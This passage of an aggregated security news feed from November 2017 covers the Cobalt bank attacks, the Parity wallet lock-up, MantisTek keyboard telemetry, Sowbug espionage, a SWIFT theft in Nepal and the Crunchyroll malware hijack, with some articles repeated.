That's a big, and frankly unrealistic ask. "We have learned prevention is never going to be enough and at some point it is realistic to assume a breach will occur," said Morales. "At that point, we must be better prepared to detect and respond to the breaches that do happen and that can cause the most damage. The goal should be to reduce the impact of those breaches."

The implication is clear. Just as business is exhorted to plan its response to an inevitable breach, individuals need to plan a response to the seemingly inevitable misuse of their stolen personal data.


Cobalt Hackers Now Targeting Banks Directly
21.11.2017 securityweek Hacking
The notorious Cobalt hackers have shown a change in tactics recently, switching their attacks to targeting banks themselves, instead of bank customers, Trend Micro reports.

Newly observed attacks appear to be part of a larger campaign that started in June and July with the targeting of Russian-speaking businesses. The techniques used are consistent with those associated with the Cobalt hacking group, but new infection chains were observed in recent incidents that targeted the bank’s employees.

Named after multifunctional penetration testing tool Cobalt Strike, the hacking group has been hitting ATMs and financial institutions across Europe. Unlike other groups that avoid Russia or Russian-speaking countries, Cobalt appears to be using the region as a testing ground for new malware and techniques, the same as the Lurk cybercriminal group, Trend Micro notes.

Last year, Russian authorities arrested 50 individuals associated with the use of the Lurk banking Trojan and supposedly took down the Angler exploit kit in the process.

In the recent attacks, the Cobalt group has been using a different vulnerability than before and also started targeting the banks themselves with spear phishing emails. The hackers are now masquerading as the customers of their targets, as a state arbitration court, and as an anti-fraud and online security company.

The group used a Rich Text Format (RTF) document with malicious macros in an attack on August 31, but switched to an exploit for CVE-2017-8759 in spam runs observed on September 20 to 21. Patched in September last year, the flaw is a code injection/remote code execution vulnerability in Microsoft’s .NET Framework.

The Cobalt hackers used this vulnerability to drop and execute Cobalt Strike from a remote server they controlled. Previously, the security bug was used to deliver the FinFisher spyware, but Trend Micro says that other threat actors have been using it of late, including the cyberespionage group ChessMaster.

As part of the attacks leveraging macro-laden RTF files, a PowerShell command is executed to retrieve a dynamic-link library (DLL) file, and odbcconf.exe, a command-line utility related to Microsoft Data Access Components, is used. The DLL drops and executes a malicious JScript using regsvr32.exe, and another JScript is dropped and executed.

The code was designed to receive backdoor commands from a remote server, and the security researchers observed it receiving a PowerShell command to download Cobalt Strike, as well as attempting to connect to a command and control (C&C) server located in France.

Infections involving CVE-2017-8759 flaw start with RTF attachments too, designed to download a Simple Object Access Protocol (SOAP) Web Services Description Language (WSDL) definition from a remote server. The code is injected into memory and downloads and executes Cobalt Strike, which in turn connects to the C&C and waits for commands.

“Many security technologies and security researchers may be utilizing newer detection mechanisms, but cybercriminals are also keeping up, adjusting their tactics to evade them. In Cobalt’s case, for instance, they’ve looked into instances of valid Windows programs or utilities as conduits that allow their malicious code to bypass whitelisting,” the security researchers note.

Mitigation techniques involve securing the use of built-in interpreters or command-line applications, such as PowerShell, odbcconf.exe, and regsvr.exe; keeping systems patched and updated at all times; securing email gateways; using network segmentation to prevent lateral movement; monitoring the network and endpoint for anomalous activities.


Day Trader Indicted for Hacking, Securities Fraud
10.11.2017 securityweek Hacking
A day trader has been indicted on four counts for his alleged role in a scheme that involved hacking into online brokerage accounts and using them to make fraudulent transactions.

Joseph Willner, 42, of Ambler, Pennsylvania, has been charged with conspiracy to commit wire fraud, conspiracy to commit securities fraud and computer intrusions, securities fraud, and conspiracy to commit money laundering.

Charges were first brought against Willner late last month by the U.S. Securities and Exchange Commission (SEC), which claimed the man made at least $700,000 through unauthorized trades involving more than 100 hacked brokerage accounts. The U.S. Attorney’s Office for the Eastern District of New York and the Department of Justice Criminal Division’s Fraud Section announced bringing charges against Willner this week.

According to authorities, between September 2014 and May 2017, the suspect and other unnamed individuals hacked into online brokerage accounts and used that access to purchase stock at artificially high prices they set by placing short sale offers using their own brokerage accounts.

After purchasing stock through victims’ accounts at above-market prices, they repurchased the stock at below-market prices. These activities took place within minutes and the operators of the scheme quickly made a profit, which they laundered by acquiring bitcoins.

In one example described in the indictment, Wilner used his own brokerage account to place a short sale order for 537 shares priced at $14.88 per share and executed the trade against one of the hacked accounts. He then repurchased the shares at $9.40 per share, landing him a profit of nearly $3,000.

Members of the scheme often used direct messages on Twitter and IRC chatrooms to communicate.

Investigators determined that the actions of Willner and his co-conspirators, one of which has been described as a foreign national, cost brokerage firms more than $2 million.

Wilner was arrested in mid-June in his hometown. If convicted, he faces up to 20 years in prison, the Justice Department said.

“This case involves a 21st Century cyber boiler room, except the buyers were not even aware they were purchasing shares of stock,” said William F. Sweeney, Jr., Assistant Director-in-Charge at the FBI’s Field Office in New York.


A regular GitHub user accidentally triggered a flaw Ethereum Parity Wallet that locked up $280 million in Ether
8.11.2017 securityaffairs Hacking

A GitHub user accidentally triggered a flaw in the Parity Wallet library contract of the standard multi-sig contract that locked up $280 million in Ether.
Ethereum made again the headlines, someone has accidentally triggered a vulnerability in the popular Parity Wallet that locked up $280 million in Ether, including $90 million raised by Parity Technologies’s founder Gavin Woods.

The huge amount of money from dozens of Ethereum wallets operated by the Smart contract coding startup Parity Technologies the was permanently locked up.

It has been estimated that Parity wallets constitute roughly 20% of the entire Ethereum network.

Parity Technologies, which is behind the popular Ethereum Parity Wallet, announced the incident that was caused by a severe vulnerability in its “multisignature” wallets created after this July 20. Owners of the affected wallets will be not able to move their funds.

” A vulnerability in the Parity Wallet library contract of the standard multi-sig contract has been found.” reads the announcement.

“Following the fix for the original multi-sig issue that had been exploited on 19th of July (function visibility), a new version of the Parity Wallet library contract was deployed on 20th of July. However that code still contained another issue – it was possible to turn the Parity Wallet library contract into a regular multi-sig wallet and become an owner of it by calling the
initWallet
function. It would seem that issue was triggered accidentally 6th Nov 2017 02:33:47 PM +UTC and subsequently a user suicided the library-turned-into-wallet, wiping out the library code which in turn rendered all multi-sig contracts unusable since their logic (any state-modifying function) was inside the library.”

The vulnerability was triggered by a regular GitHub user, “devops199,” who allegedly accidentally removed a critical library code from the source code, this operation turned all multi-sig contracts into a regular wallet address with devops199 as its owner.

Devops199 then killed the wallet contract, making all Parity multisignature wallets tied to that contract useless, and locking up their funds.

“These (https://pastebin.com/ejakDR1f) multi_sig wallets deployed using Parity were using the library located at “0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4″ address,” devops199 explained on GitHub.

“I made myself the owner of ‘0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4’ contract and killed it and now when I query the dependent contracts ‘isowner(<any_addr>)’ they all return TRUE because the delegate call made to a died contract.”

Ethereum Parity Wallet

In July, an unknown hacker has stolen nearly $32 million in funds from Parity multisignature wallets, the attacker triggered a vulnerability to compromise at least three accounts and steal nearly 153,000 units of Ether.

Parity released on 20th of July, a new version of the Parity Wallet library contract that addressed the flaw, but the code was still affected by another issue that allowed the devops199 user to turn the Parity Wallet library contract into a regular wallet.

Parity immediately froze all affected multi-sig wallets while working to fix the problem, it plans to provide further details shortly.


Built-in Keylogger Found in MantisTek GK2 Keyboards—Sends Data to China

8.11.2017 thehackernews Hacking

"The right keyboard can make all the difference between a victory and a defeat in a video game battlefield."
If you are a gamer, you can relate to the above quote.
But what if your winning weapon betrays you?
The popular 104-key Mantistek GK2 Mechanical Gaming Keyboard that costs around €49.66 has allegedly been caught silently recording everything you type on your keyboard and sending them to a server maintained by the Alibaba Group.
This built-in keylogger in Mantistek GK2 Mechanical Gaming Keyboard was noticed by a few owners who headed on to an online forum to share this issue.
According to Tom's Hardware, MantisTek keyboards utilise 'Cloud Driver' software, maybe for collecting analytic information, but has been caught sending sensitive information to servers tied to Alibaba.
After analysing more closely, Tom's Hardware team found that Mantistek keyboard does not include a full-fledged keylogger. Instead, it captures how many times a key has been pressed and sending this data back to online servers.
The affected users also provided a screenshot showing how all your plain-text keystrokes collected by the keyboard are being uploaded to a Chinese server located at IP address: 47.90.52.88.
However, even if there's no malicious intent, capturing and uploading keystroke counts without users' consent violates trust and puts systems' security at risk by leaking sensitive information.

Since Alibaba Group also sells cloud services like Google and Amazon, this collected information is not necessarily being sent to the Alibaba itself, but someone who is using its cloud service.
Opening the IP address in question directly into a web browser and on a Chinese login page, which translates to "Cloud mouse platform background management system" and is maintained by Shenzhen Cytec Technology Co., Ltd.
Reportedly, the MantisTek keyboard's software sends the collected data to two destinations at that IP address:
/cms/json/putkeyusedata.php
/cms/json/putuserevent.php
The best way to prevent your keyboard from sending your keystrokes to the Alibaba server is to stop using your Mantistek GK2 Mechanical Gaming Keyboard until you hear back from the company about this issue.
If you cannot prevent yourself from using the keyboard, but want to stop it from sending your key presses to the Alibaba server, just make sure the MantisTek Cloud Driver software is not running in the background, and block the CMS.exe executable in your firewall.
To block the CMS.exe executable, add a new firewall rule for the MantisTek Cloud Driver in the "Windows Defender Firewall With Advanced Security."


Oh, Crap! Someone Accidentally Triggered A Flaw That Locked Up $280 Million In Ethereum
8.11.2017 thehackernews Hacking
Horrible news for some Ethereum users.
About $300 million worth of Ether—the cryptocurrency unit that has become one of the most popular and increasingly valuable cryptocurrencies—from dozens of Ethereum wallets was permanently locked up today.
Smart contract coding startup Parity Technologies, which is behind the popular Ethereum Parity Wallet, announced earlier today that its "multisignature" wallets created after this July 20 contains a severe vulnerability that makes it impossible for users to move their funds out of those wallets.
According to Parity, the vulnerability was triggered by a regular GitHub user, "devops199," who allegedly accidentally removed a critical library code from the source code that turned all multi-sig contracts into a regular wallet address and made the user its owner.
Devops199 then killed this wallet contract, making all Parity multisignature wallets tied to that contract instantly useless, and therefore their funds locked away with no way to access them.
"These (https://pastebin.com/ejakDR1f) multi_sig wallets deployed using Parity were using the library located at "0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4" address," devops199 wrote on GitHub.
"I made myself the owner of '0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4' contract and killed it and now when I query the dependent contracts 'isowner(<any_addr>)' they all return TRUE because the delegate call made to a died contract."
Parity multisignature wallets also experienced a vulnerability in July this year that allowed an unknown hacker to steal nearly $32 million in funds (approximately 153,000 units of Ether) before the Ethereum community secured the rest of its vulnerable Ether.
According to Parity, a new version of the Parity Wallet library contract deployed on 20th of July contained a fix to address the previously exploited multi-sig flaw, but the code "still contained another issue," which made it possible to turn the Parity Wallet library contract into a regular wallet.
The vulnerability affected Parity multi-sig wallets that were deployed after July 20—meaning ICOs (Initial Coin Offerings) that were held since then may be impacted.
So far, it is unclear exactly how much cryptocurrency has disappeared due to this blunder, but some cryptocurrency blogs have reported that Parity wallets constitute roughly 20% of the entire Ethereum network.
This made researchers familiar with the space estimating around $280 Million worth of Ether is now inaccessible at this time, including $90 million of which was raised by Parity's founder Gavin Woods.
Parity froze all affected multi-sig wallets (that is millions of dollars' worth of Ethereum-based assets) as its team scrambles to bolster security. The team also promised to release an update with further details shortly.


Privileged Accounts Still Poorly Managed
8.11.2017 securityweek Hacking
Despite Continious Warnings, Organizations Fail to Protect Privileged Accounts

Privileged accounts are a primary target for both cyber criminals and nation-state adversaries. If they are lost, the castle will fall. Despite this, the defense of privileged account credentials still leaves much to be desired. A 2016 survey of 500 professionals indicated that nearly 70% of respondents were using 'home-grown' solutions to manage accounts.

Little seems to have changed. This week, a separate survey indicates that 37% of respondents use internally developed tools or scripts, 36% use a spreadsheet, and 18% use paper-based tracking to manage at least some of their administrative and other privileged accounts. In fact, 67% of organizations use two or more tools to manage these accounts, suggesting widespread inconsistency in privileged account management.

One Identity surveyed (PDF) more than 900 IT professionals with responsibility for security and a knowledge of IAM and privileged accounts. Approximately 300 respondents come from the U.S., 300 from the UK, France and Germany; and 300 from Australia, Singapore and Hong Kong. All of the main industry verticals are represented in the survey; but technology dominated at 27%.

Twenty-eight percent of the companies represented have more than 5,000 employees; 28% have between 2,000 and 5,000 employees; and 44% have between 500 and 2,000 employees. This preponderance of mid-range companies could bias the survey results slightly more towards SMB privileged account management than large enterprise privileged account management.

Nevertheless, the results are surprising, with basic best practices widely ignored. Eighty-six percent of organizations do not consistently change the password on their admin accounts after each use. Furthermore, 40% of IT security professionals don't take the basic best practice of changing a default admin password, the survey found.

Once a system is breached -- something that many security experts believe is inevitable and not preventable -- adversaries seek to move deeper into the network. One early step is to locate legitimate user credentials. For example, in the Sony hack, the adversaries specifically looked for files named 'passwords'. If such a file is found (and it reportedly was) containing plaintext user credentials -- and especially administrative users -- then the adversary can burrow deeper and more silently into the infrastructure.

Best practices in defending these credentials would be to protect them in a specific high security password vault, and to continuously monitor the use of privileged credentials throughout the network. One Identity found that only 54% of respondents use a password vault; and that while 95% of respondents log or monitor some privileged access, only 43% monitor all such access.

The effect is that in many cases an adversary can obtain privileged access, and then use that access without being detected. The result is unhindered, and probably invisible, lateral movement through the network.

Even where credential use is monitored, 32% of the respondents said they cannot consistently identify the individuals who perform administrator activities. The reasons are probably multifold. For example, 46% of respondents admit they have multiple administrators sharing a common set of credentials, while a far smaller number of admin users actively allow others to use their credentials.

"When an organization doesn't implement the very basic processes for security and management around privileged accounts, they are exposing themselves to significant risk. Over and over again, breaches from hacked privileged accounts have resulted in astronomical mitigation costs, as well as data theft and tarnished brands," said John Milburn, president and general manager of One Identity. "These survey results indicate that there are an alarmingly high percentage of companies that don't have proper procedures in place. It is crucial for organizations to implement best practices regarding privileged access management without creating new roadblocks for work to get done."


'Sowbug' Hackers Hit Diplomatic Targets Since 2015
8.11.2017 securityweek Hacking
A cyberespionage group that has been active since at least early-2015 has been targeting organizations in South America and Southeast Asia, while focusing mainly on foreign policy institutions and diplomatic targets, Symantec reports.

Called Sowbug by Symantec, the group is using a piece of malware called Felismus, which was detailed earlier this year. The malware is a modular Remote Access Trojan (RAT) that packs anti-analysis functions and self-updating routines, and which is capable of file upload, file download, file execution, and shell (cmd.exe) command execution.

According to Symantec, the hackers managed to infiltrate organizations in Argentina, Brazil, Ecuador, Peru, Brunei and Malaysia with the purpose of stealing documents.

“The group is well resourced, capable of infiltrating multiple targets simultaneously and will often operate outside the working hours of targeted organizations in order to maintain a low profile,” Symantec says.

An attack conducted in May 2015 on one South American foreign ministry was focused on the division of the ministry responsible for relations with the Asia-Pacific region. The hackers attempted to steal Word documents stored on a file server using a command that would bundle them into a RAR archive.

After successfully exfiltrating 4 days’ worth of data, the attackers proceeded to list all remote shared drives and attempted to access remote shares owned by the targeted division, also looking to extract all Word documents. The attackers then listed the contents of various directories on remote shares, including one belonging to the division responsible for relations with international organizations.

The attackers also deployed two unknown payloads to an infected server and maintained a presence on the target’s network for four months between May and September 2015.

This is a typical tactic for the group, which frequently maintains a long-term presence on the networks of targeted organizations, sometimes for up to six months. For that, it impersonates commonly used software packages such as Windows or Adobe Reader by renaming its tools with similar names and hiding in plain sight.

In September 2016, the group deployed the Felismus backdoor on one of the computers of an organization in Asia using the file name adobecms.exe. Next, they installed additional components and tools to a directory and started performing reconnaissance activities. Several days later, they created a sub-directory Program Files\Adobe\common and installed another tool in it, also as adobecms.exe.

The attackers supposedly performed successful network reconnaissance operations, as they managed to compromise another computer within the organization. Next, they returned to the initially compromised machine and installed an executable called fb.exe, which appears designed to copy Felismus across the network to other computers. The group maintained a presence on the target’s network until March 2017.

What the security researchers haven’t yet discovered is how Sowbug performs its initial infiltration of a target’s network. In some instances, it appears to have been deployed from other compromised computers on the network, while in others the tool known as Starloader might have been used for infection.

The same loader was observed deploying additional tools, such as credential dumpers and keyloggers, but the manner in which the loader is installed on the compromised computers remains a mystery. Fake software updates might have been employed, being used to create versions of the Felismus backdoor as well as other tools, Symantec says.

“While cyber espionage attacks are often seen against targets in the U.S., Europe, and Asia, it is much less common to see South American countries targeted. However, the number of active cyber espionage operations has increased steadily in recent years and the emergence of Sowbug is a reminder that no region is immune to this kind of threat,” Symantec notes.


Owners have found a built-in Keylogger in MantisTek GK2 Keyboards that send some data to China
8.11.2017 securityaffairs Hacking

One of the most popular Keyboards in the gaming industry, 104-key Mantistek GK2 Mechanical Gaming Keyboard send data back to China.
A wrong keyboard could represent an entry point for any organization. One of the most popular Keyboards in the gaming industry, 104-key Mantistek GK2 Mechanical Gaming Keyboard seems to include a built-in Keylogger.

A number of gamers discovered that the keyboard, that costs around €49.66, allegedly includes a component that silently records everything the user type on the keyboard and sends them to a server maintained by the Alibaba Group.

A number of owners reported their discovery on an online forum to share this issue.
“GK2 owner here. everytime you open the “MANTISTEK Cloud Driver” it sends information to 47.90.52.88 which is tied to Alibaba.com LLC. when you open the page in browser it shows login page with moonrunes that translate to “Cloud mouse platform background management system”. reported an anonymous owner.

Data collected by the MantisTek keyboard software sends the collected data to the following destinations:

/cms/json/putkeyusedata.php
/cms/json/putuserevent.php
One of the owners shared the following screenshot that shows how all your plain-text keystrokes collected by the keyboard are being uploaded to a Chinese server located at IP address: 47.90.52.88.
At the time, it is not clear if the cloud service is owned by Alibaba or is used by one of its customers who paid for the service.

Opening the IP address in in the web browser it is displayed a Chinese login page, which translates to “Cloud mouse platform background management system” that is maintained by Shenzhen Cytec Technology Co., Ltd.

Mantistek GK2 keyboards
According to Tom’s Hardware, MantisTek keyboards utilize ‘Cloud Driver’ software, the software doesn’t send key presses to the server as initially thought but only the number of times a key was pressed.

“An earlier version of the article stated that the keyboard’s software was sending key presses. However, in a closer look, it seems that the Cloud Driver software doesn’t send the key presses to the Alibaba server but only how many times each key has been pressed.” reported Tom’s Hardware.

Tom’s Hardware provided instructions to stop MantisTek keyboards from sending data to the server, it suggested to check the MantisTek Cloud Driver software is not running in the background, and block the CMS.exe executable in your firewall, users can do it by adding a new firewall rule for the MantisTek Cloud Driver in the “Windows Defender Firewall With Advanced Security.”

“The first way to stop the keyboard from sending your key presses to the Alibaba server is to ensure the MantisTek Cloud Driver software isn’t running in the background.” suggested Tom’s Hardware.

“The second method to stop the data collection is to block the CMS.exe executable in your firewall. You could do this by adding a new firewall rule for the MantisTek Cloud Driver in the “Windows Defender Firewall With Advanced Security.”


'Sowbug' Hackers Hit Diplomatic Targets Since 2015
8.11.2017 securityweek Hacking
A cyberespionage group that has been active since at least early-2015 has been targeting organizations in South America and Southeast Asia, while focusing mainly on foreign policy institutions and diplomatic targets, Symantec reports.

Called Sowbug by Symantec, the group is using a piece of malware called Felismus, which was detailed earlier this year. The malware is a modular Remote Access Trojan (RAT) that packs anti-analysis functions and self-updating routines, and which is capable of file upload, file download, file execution, and shell (cmd.exe) command execution.

According to Symantec, the hackers managed to infiltrate organizations in Argentina, Brazil, Ecuador, Peru, Brunei and Malaysia with the purpose of stealing documents.

“The group is well resourced, capable of infiltrating multiple targets simultaneously and will often operate outside the working hours of targeted organizations in order to maintain a low profile,” Symantec says.

An attack conducted in May 2015 on one South American foreign ministry was focused on the division of the ministry responsible for relations with the Asia-Pacific region. The hackers attempted to steal Word documents stored on a file server using a command that would bundle them into a RAR archive.

After successfully exfiltrating 4 days’ worth of data, the attackers proceeded to list all remote shared drives and attempted to access remote shares owned by the targeted division, also looking to extract all Word documents. The attackers then listed the contents of various directories on remote shares, including one belonging to the division responsible for relations with international organizations.

The attackers also deployed two unknown payloads to an infected server and maintained a presence on the target’s network for four months between May and September 2015.

This is a typical tactic for the group, which frequently maintains a long-term presence on the networks of targeted organizations, sometimes for up to six months. For that, it impersonates commonly used software packages such as Windows or Adobe Reader by renaming its tools with similar names and hiding in plain sight.

In September 2016, the group deployed the Felismus backdoor on one of the computers of an organization in Asia using the file name adobecms.exe. Next, they installed additional components and tools to a directory and started performing reconnaissance activities. Several days later, they created a sub-directory Program Files\Adobe\common and installed another tool in it, also as adobecms.exe.

The attackers supposedly performed successful network reconnaissance operations, as they managed to compromise another computer within the organization. Next, they returned to the initially compromised machine and installed an executable called fb.exe, which appears designed to copy Felismus across the network to other computers. The group maintained a presence on the target’s network until March 2017.

What the security researchers haven’t yet discovered is how Sowbug performs its initial infiltration of a target’s network. In some instances, it appears to have been deployed from other compromised computers on the network, while in others the tool known as Starloader might have been used for infection.

The same loader was observed deploying additional tools, such as credential dumpers and keyloggers, but the manner in which the loader is installed on the compromised computers remains a mystery. Fake software updates might have been employed, being used to create versions of the Felismus backdoor as well as other tools, Symantec says.

“While cyber espionage attacks are often seen against targets in the U.S., Europe, and Asia, it is much less common to see South American countries targeted. However, the number of active cyber espionage operations has increased steadily in recent years and the emergence of Sowbug is a reminder that no region is immune to this kind of threat,” Symantec notes.


Privileged Accounts Still Poorly Managed
8.11.2017 securityweek Hacking
Despite Continious Warnings, Organizations Fail to Protect Privileged Accounts

Privileged accounts are a primary target for both cyber criminals and nation-state adversaries. If they are lost, the castle will fall. Despite this, the defense of privileged account credentials still leaves much to be desired. A 2016 survey of 500 professionals indicated that nearly 70% of respondents were using 'home-grown' solutions to manage accounts.

Little seems to have changed. This week, a separate survey indicates that 37% of respondents use internally developed tools or scripts, 36% use a spreadsheet, and 18% use paper-based tracking to manage at least some of their administrative and other privileged accounts. In fact, 67% of organizations use two or more tools to manage these accounts, suggesting widespread inconsistency in privileged account management.

One Identity surveyed (PDF) more than 900 IT professionals with responsibility for security and a knowledge of IAM and privileged accounts. Approximately 300 respondents come from the U.S., 300 from the UK, France and Germany; and 300 from Australia, Singapore and Hong Kong. All of the main industry verticals are represented in the survey; but technology dominated at 27%.

Twenty-eight percent of the companies represented have more than 5,000 employees; 28% have between 2,000 and 5,000 employees; and 44% have between 500 and 2,000 employees. This preponderance of mid-range companies could bias the survey results slightly more towards SMB privileged account management than large enterprise privileged account management.

Nevertheless, the results are surprising, with basic best practices widely ignored. Eighty-six percent of organizations do not consistently change the password on their admin accounts after each use. Furthermore, 40% of IT security professionals don't take the basic best practice of changing a default admin password, the survey found.

Once a system is breached -- something that many security experts believe is inevitable and not preventable -- adversaries seek to move deeper into the network. One early step is to locate legitimate user credentials. For example, in the Sony hack, the adversaries specifically looked for files named 'passwords'. If such a file is found (and it reportedly was) containing plaintext user credentials -- and especially administrative users -- then the adversary can burrow deeper and more silently into the infrastructure.

Best practices in defending these credentials would be to protect them in a specific high security password vault, and to continuously monitor the use of privileged credentials throughout the network. One Identity found that only 54% of respondents use a password vault; and that while 95% of respondents log or monitor some privileged access, only 43% monitor all such access.

The effect is that in many cases an adversary can obtain privileged access, and then use that access without being detected. The result is unhindered, and probably invisible, lateral movement through the network.

Even where credential use is monitored, 32% of the respondents said they cannot consistently identify the individuals who perform administrator activities. The reasons are probably multifold. For example, 46% of respondents admit they have multiple administrators sharing a common set of credentials, while a far smaller number of admin users actively allow others to use their credentials.

"When an organization doesn't implement the very basic processes for security and management around privileged accounts, they are exposing themselves to significant risk. Over and over again, breaches from hacked privileged accounts have resulted in astronomical mitigation costs, as well as data theft and tarnished brands," said John Milburn, president and general manager of One Identity. "These survey results indicate that there are an alarmingly high percentage of companies that don't have proper procedures in place. It is crucial for organizations to implement best practices regarding privileged access management without creating new roadblocks for work to get done."


Hackers leak WhatsApp screenshots and intimate photos of WWE Diva Paige
6.11.2017 securityaffairs Hacking

A new batch of WhatsApp screenshots and intimate photos of the WWE celebrity Diva Paige was published on a popular celebrity leak website.
In March, hackers leaked online nude photos and videos of WWE Diva Paige (real name is Saraya Jade-Bevis), and now a new batch of x-rated images of the celebrity appeared on the Internet.

PAIGE ✔@RealPaigeWWE
Personal and private photos of mine were stolen and unfortunately they were shared publicly without my consent.

12:16 AM - Mar 18, 2017
4,464 4,464 Replies 7,100 7,100 Retweets 19,597 19,597 likes
Twitter Ads info and privacy
The photos are authentic and were published on the celebrity gossip site called CelebJihad.

Diva Paige

Other WWE celebrities are listed on the popular websites, other athletes, in fact, were targeted by the same hackers.

The same website proposes personal and private photos of WWE’s Diva and ring announcer JoJo.

Hackers published WhatsApp screenshots of explicit photos and selfies along with chat conversations with WWE wrestler Xavier Woods.

The WWE star is planning to return to fight after the convalescence of successful neck surgery.

The same content was also shared by Twitter account.

The hacker who leaked the pictures online announced to release more content in coming days.
Unfortunately, these events are becoming even more frequent, in 2017 personal and private photos of other WWE celebrities were leaked online.
The colleagues at the Hackread.com reported the data leaks belonging Maria, Melina, Kaitlyn, Charlotte Flair, and Victoria.

On August, intimate images of Miley Cyrus, Stella Maxwell, Kristen Stewart, Tiger Woods and Lindsey Vonn have been posted online by the same celebrity leak website.

Below the list of recommendations to keep your iCloud account secure.

Do not click on any suspicious links or attachments in unsolicited emails you received, even if they appear to have been sent by Google, Apple or Microsoft.
Enable two-factor authentication on your accounts.
Never provide sensitive and personal information via email.
Use strong passwords and change them regularly. Use different passwords for all your accounts.


The NIC Asia Bank is the last victim of the SWIFT hackers
6.11.2017 securityaffairs Hacking

The NIC Asia Bank requested the support of the Central Investigation Bureau of Nepal Police to track down the crooks who hacked the SWIFT server.
Once again hackers targeted SWIFT systems to steal money from a financial institution. The victim is the NIC Asia Bank that once discovered illegal fund transfer with its SWIFT server requested support from the Central Investigation Bureau of Nepal Police to track down the crooks.

NIC Asia Bank hack

NIC Asia Bank had carried out a forensic investigation with the support of experts from KPMG India and submitted its findings to Nepal Rastra Bank. NIC Asia Bank also sent the report of the initial investigation to the Central Investigation Bureau.

Pushkar Karki, deputy inspector general of Nepal Police and chief of CIB, confirmed that the payment order was placed by hackers who compromised the bank’s SWIFT server.

“CIB has started investigating how the server was hacked,” said Karki. “Our investigation will reveal whether or not the bank had adopted proper safeguards and which party was involved in the hacking.”

The official said NIC Asia Bank recently sought CIB support after the initial investigation carried out by KPMG and NRB.

“NIC Asia’s reluctance to report the case to CIB and the ‘inconclusive’ investigation carried out by KPMG had raised doubts whether a foreign party was involved in the illegal transfer of fund or it was an insider job.” reported The Himalayan Times.

CIB is investigating the incident with the support of both the central bank and NIC Asia Bank. NIC Asia Bank immediately reported the security breach to NRB after it discovered the suspicious transactions through its SWIFT server.

The SWIFT server of NIC Asia Bank was hacked during Tihar and the hacker tried to transfer the money to various parties in six countries, including Japan, UK, the US, and Singapore, through Standard Chartered New York and Mashreq Bank New York, through which the bank operates its foreign currency accounts.

The collaboration with the central bank and the other banks, NIC Asia was able to block the fraudulent transactions except for around Rs 60 million that was reportedly released to the concerned parties.

The overall amount of money retrieved by the bank was around Rs 460 million, Rs 400 million has been retrieved.

“A separate investigation carried out by the central bank immediately after NIC Asia Bank notified the regulator revealed that staffers assigned to operate the SWIFT system of the bank had used a computer dedicated for SWIFT operation for other purposes also.” added The Himalayan Times

The NIC Asia Bank has transferred all of the six staffers who handled the SWIFT operation to other departments.


Popular Anime crunchyroll.com hijacked to distribute a keylogger
5.11.2017 securityaffairs Hacking

The popular Anime site Crunchyroll.com was hijacked to distribute malware, according to the operators the site was not hacked.
The popular Anime site Crunchyroll.com was hijacked to distribute malware, once discovered the hack, the operators have issued alerts informing visitors to don’t visit the site and later they took it offline.

4 Nov
Crunchyroll.de ✔ @Crunchyroll_de
ACHTUNG! BITTE TEILEN!

Bitte gegenwärtig NICHT unsere Webseite ansteuern, da wir aktuell ein Problem mit Schadsoftware haben.

Crunchyroll.de ✔@Crunchyroll_de
And for our English-speaking audience
Please DO NOT access our website at the current time. We are aware of the issues and are working on it

1:06 PM - Nov 4, 2017
39 39 Replies 1,247 1,247 Retweets 895 895 likes
Twitter Ads info and privacy
The visitors were prompted to download and try a new desktop version of Crunchyroll software that was tainted with a malware.

“Their main page auto downloads a suspicious .exe file. So far I havent seen more info on their twitter about what happened.” reported a Reddit user.

Crunchyroll fake app

It was a fake desktop application that was not offered by the Crunchyroll site.

According to Crunchyroll, attackers did not breach the website, it appears as a DNS hijack that redirected users to a bogus copy of the website used by the attackers to deliver the malware.

4 Nov
Crunchyroll.de ✔ @Crunchyroll_de
ACHTUNG! BITTE TEILEN!

Bitte gegenwärtig NICHT unsere Webseite ansteuern, da wir aktuell ein Problem mit Schadsoftware haben.

Crunchyroll.de ✔@Crunchyroll_de
And for our English-speaking audience
Please DO NOT access our website at the current time. We are aware of the issues and are working on it

1:06 PM - Nov 4, 2017
39 39 Replies 1,247 1,247 Retweets 895 895 likes
Twitter Ads info and privacy
At the time, the situation has been solved.
Crunchyroll ✔@Crunchyroll
We've just gotten the all-clear to say that http://www.crunchyroll.com/ is back online!! Thank you SO MUCH for your patience ~ ❤️

5:31 PM - Nov 4, 2017
278 278 Replies 3,141 3,141 Retweets 8,227 8,227 likes
Twitter Ads info and privacy
Lawrence Abrams from Bleepingcomputer.com has analyzed the malicious code delivered by the website, once executed it would extract an embedded base64 encoded file to %AppData%\svchost.exe and execute it.

When the malware starts, it will create an autostart called Java that executes the %AppData%\svchost.exe program when the victim logs into the computer.

According to the security researcher Bart Blaze who followed the hack, the malware was a keylogger.

“There are claims the malware will additionally install ransomware – I have not observed this behaviour, but it is definitely possible once the C2 sends back (any) commands. More likely, it is a form of keylogger – malware that can record anything you type, and send it back to the attacker.” wrote Blaze.

The good news for users infected by the malware is that it is easy to remove even if it is detected only by 25 out of 67 antivirus software.

Below the instructions published by Lawrence Abrams from Bleepingcomputerfrom;

Open the Windows Registry Editor by typing regedit in the Start Menu search bar. When you see regedit.exe or Registry Editor in the search results, click on it to launch the program.
When the Registry Editor is open, navigate to HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and single-left click on the Run key. You should now see in the right pane a value called Java.
Now right-click on the Java entry and select Delete as shown in the image below.
When it asks you to confirm that you wish to delete the value, click on the Yes button.
Now reboot your computer and when you log back in, the malware executable will no longer be started.
Now navigate to the %AppData% (Typically C:\users\[user_name]\appdata\roaming) folder and you should see a program called svchost.exe.
Right-click on this file and select Delete to delete it from the computer.
Now perform a scan using your installed security software. If you do not have a security software, now may be a good time to install one.
If this malware was indeed a keylogger, you may also want to consider changing the password to any sites that you logged into after installing this fake Crunchyroll program.


Equifax Says Execs Unaware of Hack When They Sold Stock
4.11.2017 securityweek Hacking
Equifax said Friday an internal review found that four executives who sold shares ahead of disclosure of a massive data breach at the credit agency were unaware of the incident ahead of the sale.

The company released the findings of its review of the stock sales worth some $1.8 million just prior to public disclosure of the hack affecting sensitive data of some 145 million as well as some British and Canadian nationals.

The "special committee" investigating for the company concluded that "none of the four executives had knowledge of the incident" and that none engaged in insider trading.

The committee reviewed more than 55,000 documents including emails, text messages, phone logs and other records, according to a company statement.

